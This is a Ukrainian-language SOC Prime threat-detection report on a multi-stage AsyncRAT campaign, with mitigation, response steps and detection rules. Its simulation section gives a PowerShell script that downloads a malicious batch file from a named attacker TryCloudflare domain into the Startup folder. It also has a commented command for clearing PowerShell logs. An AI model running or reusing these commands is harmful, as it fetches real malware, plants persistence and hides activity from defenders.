SOC Prime Bias: Критичний

14 Jan 2026 15:04 UTC

Як MDR виявила багаторівневий ланцюг атаки AsyncRAT

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Стежити
Як MDR виявила багаторівневий ланцюг атаки AsyncRAT
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Звіт описує багаторівневий ланцюг вторгнення, розпочатий через фішингові електронні листи, які доставляють ZIP-приманки з подвійним розширенням і переходять у послідовність завантаження, розміщену на WebDAV. Оператори зловживають інфраструктурою безкоштовного рівня Cloudflare і вбудованими компонентами Python для розгортання AsyncRAT на кінцевих точках жертв. Виконання і стійкість покладаються на власні інструменти Windows — Windows Script Host, PowerShell і пакетні сценарії — тоді як на фінальному етапі використовується впорскування коду в explorer.exe. Маршрутизуючи доставку та підготовку через загальноприйняті хмарні сервіси, активність зливається із нормальним трафіком і може уникнути звичайних периметрових засобів контролю.

Розслідування

Дослідники з Trend Micro повідомили про телеметрію, яка відповідає поетапному процесу доставки: отримання .pdf.zip архіву з Dropbox, виконання вбудованих .url ярликів і подальша взаємодія з WebDAV, якій приписується svchost.exe і rundll32.exe. Ланцюжок потім розгорнув вбудовані файли Python 3.14.0, які використовувалися для запуску спеціального сценарію Python, відповідального за ін’єкцію APC з шеловим кодом AsyncRAT. Стійкість була досягнута шляхом розміщення пакетних файлів у каталозі автозапуску користувача. Аналітики також ідентифікували та зіставили декілька хостів TryCloudflare, що підтримують інфраструктуру.

Пом’якшення

Зменште вплив, навчаючи користувачів сприймати архіви з подвійним розширенням і неочікувані ZIP-вкладення як підозрілі та посилюючи фільтрацію для фішингово-доставлених хмарних посилань. Блокуйте або суворо контролюйте доступ до несанкціонованих хмарних тунельних сервісів та контролюйте ненормальну залежність від WebDAV в середовищах, де це рідкість. Обмежте виконання сценаріїв з каталогів, доступних для запису користувачу, і посиліть контролі навколо використання папки автозапуску і створення запланованих завдань. Пріоритизуйте виявлення EDR/поведінкового аналізу, які можуть виявити ланцюжки виконання, що управляються сценаріями, та техніки впорскування коду, що націлені на нешкідливі процеси.

Реакція

Якщо виявлено активність, ізолювати кінцеву точку та зупинити підозрілі процеси, пов’язані з ланцюгом (особливо svchost.exe, rundll32.exe та python.exe, коли вони пов’язані з інцидентом). Видаліть стійкість, видаливши шкідливі пакетні артефакти з каталогу автозапуску, ліквідуйте завантажені архіви Python та будь-які компоненти AsyncRAT, та проведіть повне судово-медичне обстеження на додаткові підготовчі файли та переміщення по мережі. Оновіть мережеві контроли та списки блокувань, включаючи виявлені домени TryCloudflare та будь-яку пов’язану інфраструктуру, виявлену під час триажу.

Потік атаки

Виявлення

Завантаження або завантаження через Powershell (через командний рядок)

Команда SOC Prime
13 січня 2026

LOLBAS WScript / CScript (через створення процесів)

Команда SOC Prime
13 січня 2026

Файл Python створено в незвичній директорії (через подію файлу)

Команда SOC Prime
13 січня 2026

Підозріле спілкування з доменом Trycloudflare (через проксі)

Команда SOC Prime
13 січня 2026

Можлива операція ручного або сценарійного виконання була здійснена в незвичних папках (через командний рядок)

Команда SOC Prime
13 січня 2026

Підозріле спілкування з доменом Trycloudflare (через DNS)

Команда SOC Prime
13 січня 2026

IOCs (DestinationIP) для виявлення: Аналіз багаторівневої кампанії AsyncRAT через кероване виявлення та реагування

SOC Prime AI правила
13 січня 2026

IOCs (SourceIP) для виявлення: Аналіз багаторівневої кампанії AsyncRAT через кероване виявлення та реагування

SOC Prime AI правила
13 січня 2026

Команда PowerShell для завантаження Python та пакетних файлів для налаштування середовища та стійкості [Windows Powershell]

SOC Prime AI правила
13 січня 2026

Фішингова кампанія з використанням Edge та Cmd для виконання сценарію Python для впорскування коду [Windows Створення процесів]

SOC Prime AI правила
13 січня 2026

Виконання симуляції

Передумова: Телеметрія та передполітна перевірка базового показника повинні були бути пройдені.

  • Оповідь атаки та команди

    Противник, який отримав початковий доступ до PowerShell на скомпрометованому хості Windows, хоче налаштувати середовище виконання Python і досягти стійкості. Вони:

    1. Завантажити вбудований дистрибутив Python безпосередньо на локальну Temp директорію користувача, використовуючи Invoke‑WebRequest.
    2. Завантажити шкідливий пакетний сценарій (ahke.bat) з домену, що проксійований Cloudflare, у папку автозапуску користувача, щоб він виконувався під час кожного входу в систему.
    3. Виконати завантажений zip-архів Python (опущено тут для стислості), щоб виконати подальші навантаження.

    Ці кроки генерують точні командні рядки, що співпадають з правилом Sigma, створюючи журнали блоків сценарію PowerShell з iwr … -OutFile … шаблоном.

  • Сценарій регресійного тестування

    # -------------------------------------------------
    # Імітація налаштування середовища AsyncRAT за допомогою PowerShell
    # -------------------------------------------------
    
    # 1. Завантаження вбудованого zip-файлу Python у папку temp користувача
    $pythonUrl = 'https://www.python.org/ftp/python/3.14.0/python-3.14.0-embed-amd64.zip'
    $pythonDest = "$env:USERPROFILEAppDataLocalTempp.zip"
    iwr $pythonUrl -OutFile $pythonDest
    
    # 2. Завантаження шкідливого пакетного файлу в Автозапуск для стійкості
    $batUrl = 'https://plus-condos-thy-redeem.trycloudflare.com/ahke.bat'
    $batDest = "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupahke.bat"
    iwr $batUrl -OutFile $batDest
    
    # 3. (Необов'язково) Запуск виконання пакету для демонстрації стійкості
    # Start-Process -FilePath $batDest -WindowStyle Hidden
    # -------------------------------------------------
  • Команди очищення

    # Видаліть завантажені артефакти
    Remove-Item -Path "$env:USERPROFILEAppDataLocalTempp.zip" -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupahke.bat" -ErrorAction SilentlyContinue
    
    # За потреби очистіть журнали блоків сценаріїв PowerShell (потребує прав адміністратора)
    # Clear-EventLog -LogName "Microsoft-Windows-PowerShell/Operational"